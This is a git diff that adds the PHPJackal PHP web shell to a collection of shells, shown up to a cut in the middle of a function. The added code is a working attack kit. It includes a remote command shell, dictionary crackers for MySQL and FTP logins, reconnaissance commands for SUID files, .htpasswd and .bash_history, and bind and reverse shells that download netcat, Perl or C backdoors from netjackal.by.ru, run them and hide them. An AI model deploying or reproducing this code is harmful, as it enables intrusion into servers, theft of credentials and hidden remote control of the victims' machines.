+$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$sql=@mysql_connect($target,$user,$pass); +if($sql){echo "U: $user P: $pass (<a href=\"".hlinK("seC=mysql&serveR=$target&useR=$user&pasS=$pass&querY=SHOW+DATABASES&workingdiR=".getcwd())."\">Connect</a>)<br>";mysql_close($sql);if(!$type)break;} +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +else{ +echo "<center>${t}MySQL cracker:$crack"; +} +} +} +function ftpcrackeR(){ +global $errorbox,$t,$et,$crack; +if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et"; +else{ +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;} +if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;} +ftp_close($ftp); +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +else echo "<center>${t}FTP cracker:$crack"; +}} +function 
openiT($name){ +$ext=strtolower(substr($name,strrpos($name,'.')+1)); +$src=array('php','php3','php4','phps','phtml','phtm','inc'); +if(in_array($ext,$src))highlight_file($name); +else echo "<font color=blue><pre>".htmlspecialchars(file_get_contents($name))."</pre></font>"; +} +function logouT(){ +setcookie('passw','',time()-10000); +header('Location: '.hlinK()); +} +?> +<html> +<head> +<style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table { font-size: 15px; } .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style> +<meta http-equiv="Content-Language" content="en-us"> +<title>PHPJackal</title> +</head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC"> +<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%"> +<tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php $cwd= getcwd(); echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=mysql&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mailer]</a> - <a href="<?php echo 
hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=whois&workingdiR=$cwd");?>">[Whois]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href=\"".hlinK("seC=logout")."\">Logout</a>]";?></td></tr></table> +<hr size=1 noshade> +<?php +if (!empty($_REQUEST['seC'])){ +switch($_REQUEST['seC']){ +case 'fm':filemanager();break; +case 'sc':scanneR();break; +case 'phpinfo': phpinfo();break; +case 'edit': if (!empty($_REQUEST['open']))editoR($_REQUEST['filE']); +if (!empty($_REQUEST['Save'])){ +$filehandle= fopen($_REQUEST['file'],"w"); +fwrite($filehandle,$_REQUEST['edited']); +fclose($filehandle);} +if (!empty($_REQUEST['filE'])) editoR($_REQUEST['filE']);else editoR(''); +break; +case 'openit':openiT($_REQUEST['namE']);break; +case 'cr': crackeR();break; +case 'dic':dicmakeR();break; +case 'whois':whoiS();break; +case 'hex':hexvieW();break; +case 'img':showimagE($_REQUEST['filE']);break; +case 'inc':include ($_REQUEST['filE']);break; +case 'hc':hashcrackeR();break; +case 'fcr':formcrackeR();break; +case 'snmp':snmpcrackeR();break; +case 'sql':sqlcrackeR();break; +case 'auth':authcrackeR();break; +case 'pop3':pop3crackeR();break; +case 'imap':imapcrackeR();break; +case 'smtp':smtpcrackeR();break; +case 'ftp':ftpcrackeR();break; +case 'eval':phpevaL();break; +case 'px':pr0xy();break; +case 'webshell':webshelL();break; +case 'mailer':maileR();break; +case 'br':brshelL();break; +case 'asm':safemodE();break; +case 'mysql':mysqlclienT();break; +case 'calc':calC();break; +case 'sysinfo':sysinfO();break; +case 'checksum':checksuM($_REQUEST['filE']);break; +case 'logout':logouT();break; 
+default: echo $intro;
+}}else echo $intro;
+echo $footer;?></body></html>
\ No newline at end of file
diff --git a/php/PHPshell/م€گPHPJackalم€‘/PHPJackal.jpg b/php/PHPshell/م€گPHPJackalم€‘/PHPJackal.jpg
new file mode 100644
index 0000000..ad1d5e3
Binary files /dev/null and b/php/PHPshell/م€گPHPJackalم€‘/PHPJackal.jpg differ
diff --git a/php/PHPshell/م€گPHPJackalم€‘/PHPJackal.php b/php/PHPshell/م€گPHPJackalم€‘/PHPJackal.php
new file mode 100644
index 0000000..87862ba
--- /dev/null
+++ b/php/PHPshell/م€گPHPJackalم€‘/PHPJackal.php
@@ -0,0 +1,1582 @@ +<?php +#--Config--# +$login_password=''; +#----------# +error_reporting(E_ALL); +ignore_user_abort(true); +set_time_limit(0); +ini_set('max_execution_time','0'); +ini_set('memory_limit','9999M'); +ini_set('output_buffering',0); +set_magic_quotes_runtime(0); +if(!isset($_SERVER))$_SERVER=&$HTTP_SERVER_VARS; +if(!isset($_POST))$_POST=&$HTTP_POST_VARS; +if(!isset($_GET))$_GET=&$HTTP_GET_VARS; +if(!isset($_COOKIE))$_COOKIE=&$HTTP_COOKIE_VARS; +if(!isset($_FILES))$_FILES=&$HTTP_POST_FILES; +$_REQUEST = array_merge($_GET,$_POST); +if(get_magic_quotes_gpc()){ +foreach($_REQUEST as $key=>$value)$_REQUEST[$key]=stripslashes($value); +} +function hlinK($str=''){ +$myvars=array('modE','chmoD','workingdiR','urL','cracK','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL'); +$ret=$_SERVER['PHP_SELF'].'?'; +$new=explode('&',$str); +foreach($_GET as $key => $v){ +$add=1; +foreach($new as $m){ +$el=explode('=',$m); +if($el[0]==$key)$add=0; +} +if($add){if(!in_array($key,$myvars))$ret.="$key=$v&";} +} +$ret.=$str; +return $ret; +} +$et='</td></tr></table>'; +if(!empty($login_password)){ +if(!empty($_REQUEST['fpassw'])){ +if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw'])); +header('Location: '.hlinK()); +} +if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></form>$et</body></html>"); +} +if(!empty($_REQUEST['workingdiR']))chdir($_REQUEST['workingdiR']); +$disablefunctions=ini_get('disable_functions'); +$disablefunctions=explode(',',$disablefunctions); +function checkthisporT($ip,$port,$timeout,$type=0){ +if(!$type){ +$scan=fsockopen($ip,$port,$n,$s,$timeout); +if($scan){fclose($scan);return 1;} +} +elseif(function_exists('socket_set_timeout')){ +$scan=fsockopen("udp://$ip",$port); +if($scan){ 
+socket_set_timeout($scan,$timeout); +fwrite($scan,"\x00"); +$s=time(); +fread($scan,1); +if((time()-$s)>=$timeout){fclose($scan);return 1;} +} +} +return 0; +} +if(!function_exists('file_get_contents')){ +function file_get_contents($addr){ +$a=fopen($addr,'r'); +$tmp=fread($a,filesize($a)); +fclose($a); +if($a)return $tmp;else return null; +} +} +if(!function_exists('file_put_contents')){ +function file_put_contents($addr,$con){ +$a=fopen($addr,'w'); +if(!$a)return 0; +$t=fwrite($a,$con); +fclose($a); +if($t)return strlen($con); +return 0; +} +} +function file_add_contentS($addr,$con){ +$a=fopen($addr,'a'); +if(!$a)return 0; +fwrite($a,$con); +fclose($a); +return strlen($con); +} +if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']); +if(!empty($_REQUEST['downloaD'])){ +ob_clean(); +$dl=$_REQUEST['downloaD']; +$con=file_get_contents($dl); +header('Content-type: application/octet-stream'); +header("Content-disposition: attachment; filename=\"$dl\";"); +header('Content-length: '.strlen($con)); +echo $con; +exit; +} +if(!empty($_REQUEST['imagE'])){ +$img=$_REQUEST['imagE']; +header('Content-type: imagE/gif'); +header("Content-length: ".filesize($img)); +header("Last-Modified: ".date('r',filemtime($img))); +echo file_get_contents($img); +exit; +} +if(!empty($_REQUEST['exT'])){ +$ex=$_REQUEST['exT']; +$e=get_extension_funcs($ex); +echo '<html><head><title>'.htmlspecialchars($ex).'</title></head><body><b>Functions:</b><br>';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disablefunctions))echo '<font color=red>DISABLED</font>';echo '<br>';} +echo '</body></html>'; +exit; +} +header('Cache-Control: no-cache, must-revalidate'); +header('Expires: Mon, 7 Aug 1987 05:00:00 GMT'); +function showsizE($size){ +if($size>=1073741824)$size=round(($size/1073741824),2).' GB'; +elseif($size>=1048576)$size=round(($size/1048576),2).' MB'; +elseif($size>=1024)$size=round(($size/1024),2).' 
KB'; +else $size.=' B'; +return $size; +} +$windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0; +$errorbox="<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td><b>Error: </b>"; +$v='1.9'; +$cwd=getcwd(); +$msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td align='center'>"; +$intro="<center><table border=0 style='border-collapse: collapse'><tr><td bgcolor='#666666'><b>Script:</b><br>".str_repeat('-=-',25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat('-=-',25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href='http://netjackal.by.ru/' target='_blank'>http://netjackal.by.ru/</a><br><b>Email:</b> <a href='mailto:nima_501@yahoo.com?subject=PHPJackal'>nima_501@yahoo.com</a><br><noscript>".str_repeat('-=-',25)."<br><b>Error: Enable JavaScript in your browser!!!</b></noscript>$et</center>"; +$footer="${msgbox}PHPJackal v$v - Powered By <a href='http://netjackal.by.ru/' target='_blank'>NetJackal</a>$et"; +$hcwd="<input type=hidden name=workingdiR value='$cwd'>"; +$t="<table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#333333'>"; +$crack="</td><td bgcolor='#333333'></td></tr><form method='POST' name=form><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 
value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>"; +function checkfunctioN($func){ +global $disablefunctions,$safemode; +$safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open'); +if($safemode=='ON' && in_array($func,$safe))return 0; +elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1; +return 0; +} +function whereistmP(){ +$uploadtmp=ini_get('upload_tmp_dir'); +$uf=getenv('USERPROFILE'); +$af=getenv('ALLUSERSPROFILE'); +$se=ini_get('session.save_path'); +$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); +if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; +if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; +if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; +if(is_dir($uf) && is_writable($uf))return $uf; +if(is_dir($af) && is_writable($af))return $af; +if(is_dir($se) && is_writable($se))return $se; +if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; +if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; +return '.'; +} +function shelL($command){ +global $windows; +$exec=$output=''; +$dep[]=array('pipe','r');$dep[]=array('pipe','w'); +if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} +elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} 
+elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;} +elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command); +elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);} +elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);} +elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command); +elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command); +elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws); +return $exec; +} +function getiT($get){ +$fo=strtolower(ini_get('allow_url_fopen')); +$ui=strtolower(ini_get('allow_url_include')); +if($fo || $fo=='on')$con=file_get_contents($get); +elseif($ui || $ui=='on'){ +ob_start(); +include('http://netjackal.net/'); +$con=ob_get_contents(); +ob_end_clean(); +} +else{ +$u=parse_url($get); +$host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port']; +$url=fsockopen($host,$port,$en,$es,12); +fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); +$tmp=$con=''; +while($tmp!="\r\n")$tmp=fgets($url); +while(!feof($url))$con.=fgets($url); +} +return $con; +} +function downloadiT($get,$put){ +$con=getiT($get); +$mk=file_put_contents($put,$con); +if($mk)return 1; +return 0; +} +function winshelL($command){ +$name=whereistmP()."\\".uniqid('NJ'); +win_shell_execute('cmd.exe','',"/C $command >\"$name\""); +sleep(1); +$exec=file_get_contents($name); +unlink($name); +return $exec; +} +function srvshelL($command){ +$name=whereistmP()."\\".uniqid('NJ'); +$n=uniqid('NJ'); +$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; 
+win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
+win32_start_service($n);
+win32_stop_service($n);
+win32_delete_service($n);
+sleep(1);
+$exec=file_get_contents($name);
+unlink($name);
+return $exec;
+}
+function comshelL($command,$ws){
+$exec=$ws->exec ("cmd.exe /c $command");
+$so=$exec->StdOut();
+return $so->ReadAll();
+}
+function smtpchecK($addr,$user,$pass,$timeout){
+$sock=fsockopen($addr,25,$n,$s,$timeout);
+if(!$sock)return -1;
+fread($sock,1024);
+fputs($sock,'ehlo '.uniqid('NJ')."\r\n");
+$res=substr(fgets($sock,512),0,1);
+if($res!='2')return 0;
+fgets($sock,512);fgets($sock,512);fgets($sock,512);
+fputs($sock,"AUTH LOGIN\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='334')return 0;
+fputs($sock,base64_encode($user)."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='334')return 0;
+fputs($sock,base64_encode($pass)."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='235')return 0;
+return 1;
+}
+function mysqlchecK($host,$user,$pass,$timeout){
+if(function_exists('mysql_connect')){
+$l=mysql_connect($host,$user,$pass);
+if($l)return 1;
+}
+return 0;
+}
+function mssqlchecK($host,$user,$pass,$timeout){
+if(function_exists('mssql_connect')){
+$l=mssql_connect($host,$user,$pass);
+if($l)return 1;
+}
+return 0;
+}
+function checksmtP($host,$timeout){
+$from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com';
+$sock=fsockopen($host,25,$n,$s,$timeout);
+if(!$sock)return -1;
+$res=substr(fgets($sock,512),0,3);
+if($res!='220')return 0;
+fputs($sock,'HELO '.uniqid('NJ')."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"MAIL FROM: <$from>\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"DATA\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='354')return 0;
+fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." <$from>\r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+return 1;
+}
+function replace_stR($s,$h){
+$ret=$h;
+foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret);
+return $ret;
+}
+function check_urL($url,$method,$search='200',$timeout=3){
+$u=parse_url($url);
+$method=strtoupper($method);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];
+$data=(!empty($u['query']))?$u['query']:'';
+if(!empty($data))$data="?$data";
+$sock=fsockopen($host,$port,$en,$es,$timeout);
+if($sock){
+fputs($sock,"$method $file$data HTTP/1.0\r\n");
+fputs($sock,"Host: $host\r\n");
+if($method=='GET')fputs($sock,"\r\n");
+elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
+else return 0;
+if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;}
+while(!feof($sock)){
+$res=fgets($sock);
+if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
+}
+fclose($sock);
+}
+return 0;
+}
+function get_sw_namE($host,$timeout){
+$sock=fsockopen($host,80,$en,$es,$timeout);
+if($sock){
+$page=uniqid('NJ');
+fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
+while(!feof($sock)){
+$con=fgets($sock);
+if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
+}
+fclose($sock);
+return -1;
+}return 0;
+}
+function snmpchecK($ip,$com,$timeout){
+$res=0;
+$n=chr(0x00);
+$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n;
+$sock=fsockopen("udp://$ip",161);
+if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout);
+fputs($sock,$packet);
+socket_set_timeout($sock,$timeout);
+$res=fgets($sock);
+fclose($sock);
+if($res != '')return 1;else return 0;
+}
+$safemode=(ini_get('safe_mode') || strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF';
+if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');}
+function brshelL(){
+global $errorbox,$windows,$et,$hcwd;
+$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
+$addr='http://netjackal.by.ru/br';
+$error="$errorbox Can not make backdoor file, go to writeable folder.$et";
+$n=uniqid('NJ_');
+if(!$windows)$n=".$n";
+$d=whereistmP();
+$name=$d.DIRECTORY_SEPARATOR.$n;
+$c=($_REQUEST['C'])?1:0;
+if(!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1)){
+$port=(int)$_REQUEST['port'];
+if($windows){
+if($c){
+$name.='.exe';
+$bd=downloadiT("$addr/nc",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");
+}else{
+$name=$name.'.pl';
+$bd=downloadiT("$addr/winbind.p",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("perl $name $port");
+}
+}
+else{
+if($c){
+$bd=downloadiT("$addr/bind.c",$name);
+if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");
+}else{
+$bd=downloadiT("$addr/bind.p",$name);
+if(!$bd)echo $error;else shelL("cd $d;perl $n $port &");
+echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>";
+}
+}
+}
+elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){
+$ip=$_REQUEST['ip'];
+$port=(int)$_REQUEST['rport'];
+if($windows){
+if($c){
+$name.='.exe';
+$bd=downloadiT("$addr/nc",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");
+}else{
+$name=$name.'.pl';
+$bd=downloadiT("$addr/winrc.p",$name);
+shelL("attrib +H $name");
+if (!$bd)echo $error;else shelL("perl.exe $name $ip $port");
+}
+}
+else{
+if($c){
+$bd=downloadiT("$addr/rc.c",$name);
+if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
+}else{
+$bd=downloadiT("$addr/rc.p",$name);
+if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &");
+}
+}
+echo '<font color=blue>Done!</font>';}
+else{echo "<table border=0 style='border-collapse: collapse' width='100%'><tr><td><table border=0 style='border-collapse: collapse' width='50%'><tr><td width='50%' bgcolor='#333333'>Bind shell:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Port:</td><td bgcolor='#666666'><input type=text name=port value=55501 size=5></td></tr><tr><td width='20%' bgcolor='#808080'>Type:</td><td bgcolor='#808080'><input type=radio style='border-width:1px;background-color:#808080;' value=0 checked name=C>PERL<input type=radio style='border-width:1px;background-color:#808080;' name=C value=1>";if($windows)echo 'EXE';else echo 'C';echo"</td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input type=submit class=buttons value=Bind></form>$et</td><td><table border=0 style='border-collapse: collapse' width='50%'><tr><td width='40%' bgcolor='#333333'>Reverse shell:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#808080'>IP:</td><td bgcolor='#808080'><input type=text name=ip value=";echo $_SERVER['REMOTE_ADDR'];echo " size=17></td></tr><tr><td width='20%' bgcolor='#666666'>Port:</td><td bgcolor='#666666'><input type=text name=rport value=53 size=5></td></tr><tr><td width='20%' bgcolor='#808080'>Type:</td><td bgcolor='#808080'><input type=radio style='border-width:1px;background-color:#808080;' value=0 checked name=C>PERL<input type=radio style='border-width:1px;background-color:#808080;' name=C value=1>";if($windows)echo 'EXE';else echo 'C';echo"</td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value=Connect></form>$et$et";}}
+function showimagE($img){
+echo "<center><img border=0 src='".hlinK("imagE=$img&&workingdiR=".getcwd())."'></center>";}
+function editoR($file){
+global $errorbox,$et,$hcwd,$cwd;
+if(is_file($file)){
+if(!is_readable($file)){echo "$errorbox File is not readable$et<br>";}
+if(!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";}
+$data=file_get_contents($file);
+echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='10%' bgcolor='#808080'><form method='POST'>$hcwd<input type=text value='".htmlspecialchars($file)."' size=75 name=file><input type=submit class=buttons name=Open value=Open></form>$et<br><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#666666'><form method='POST'><textarea rows='18' name='edited' cols='64'>";
+echo htmlspecialchars($data);
+echo "</textarea></td></tr><tr><td width='10%' bgcolor='#808080'><input type=text value='$file' size=80 name=file></td></tr><td width='40%' bgcolor='#666666' align='right'>";
+}
+else {echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='10%' bgcolor='#808080'><form method='POST'><input type=text value='$cwd' size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></form>$et<br><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#666666'><form method='POST'><textarea rows='18' name='edited' cols='63'></textarea></td></tr><tr><td width='10%' bgcolor='#808080'><input type=text value='$cwd' size=80 name=file></td></tr><td width='40%' bgcolor='#666666' align='right'>";
+}
+echo "$hcwd<input type=submit class=buttons name=Save value=Save></form>$et</center>";
+}
+function webshelL(){
+global $windows,$hcwd,$et,$cwd;
+if($windows){
+$alias="<option value='netstat -an'>Display open ports</option><option value='tasklist'>List of processes</option><option value='systeminfo'>System information</option><option value='ipconfig /all'>IP configuration</option><option value='getmac'>Get MAC address</option><option value='net start'>Services list</option><option value='net view'>Machines in domain</option><option value='net user'>Users list</option><option value='shutdown -s -f -t 1'>Turn off the server</option>";
+}
+else{
+$alias="<option value='netstat -an | grep -i listen'>Display open ports</option><option value='last -a -n 250 -i'>Show last 250 logged in users</option><option value='which wget curl lynx w3m'>Downloaders</option><option value='find / -perm -2 -type d -print'>Find world-writable directories</option><option value='find . -perm -2 -type d -print'>Find world-writable directories(in current directory)</option><option value='find / -perm -2 -type f -print'>Find world-writable files</option><option value='find . -perm -2 -type f -print'>Find world-writable files(in current directory)</option><option value='find / -type f -perm 04000 -ls'>Find files with SUID bit set</option><option value='find / -type f -perm 02000 -ls'>Find files with SGID bit set</option><option value='find / -name .htpasswd -type f'>Find .htpasswd files</option><option value='find / -type f -name .bash_history'>Find .bash_history files</option><option value='cat /etc/syslog.conf'>View syslog.conf</option><option value='cat cat /etc/hosts'>View hosts</option><option value='ps auxw'>List of processes</option>";
+if(is_dir('/etc/valiases'))$alias.="<option value='ls -l /etc/valiases'>List of cPanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value='ls -l /etc/vdomainaliases'>List cPanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value='cat /var/cpanel/accounting.log'>Display cPanel`s log</option>";
+if(is_dir('/var/spool/mail/'))$alias.="<option value='ls /var/spool/mail/'>Mailboxes list</option>";
+}
+echo "<center><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='65%'><form method='POST'><tr><td width='20%'><b>Location:</b><input type=text name=workingdiR size=82 value='$cwd'><input class=buttons type=submit value=Change></form>$et<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='65%'><tr><td><b>Web Shell:</b></td></tr><td bgcolor='#666666'><textarea rows='23' cols='79'>";
+if(!empty($_REQUEST['cmd']))echo shelL($_REQUEST['cmd']);
